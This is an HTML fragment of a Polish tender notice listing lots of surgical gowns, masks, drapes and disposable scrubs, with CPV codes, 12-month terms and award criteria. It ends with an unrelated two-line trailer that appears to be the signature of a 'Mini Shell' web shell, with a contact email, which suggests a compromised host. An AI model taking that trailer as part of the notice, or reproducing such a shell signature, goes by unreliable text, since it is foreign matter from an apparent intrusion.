<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuchy barierowe chirurgiczne wielkokrotnego uzytku, odziez operacyjna wielokrotnego uzytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odzież ochronna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepki chirurgiczne, maski chirurgiczne, fartuchy higieniczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Folia chirurgczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Folia chirurgiczna bakteriobójcza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Obłożenie do cięcia cesarskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obłożenie chirurgiczne do cięcia cesarskiego (duży zestaw).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prześcieradło nieprzemakalne, ubranie chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowe prześcieradło nieprzemakalne z chłonnego i mocnego laminatu, ubranie chirurgiczne (bluza, spodnie) jednorazowego użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com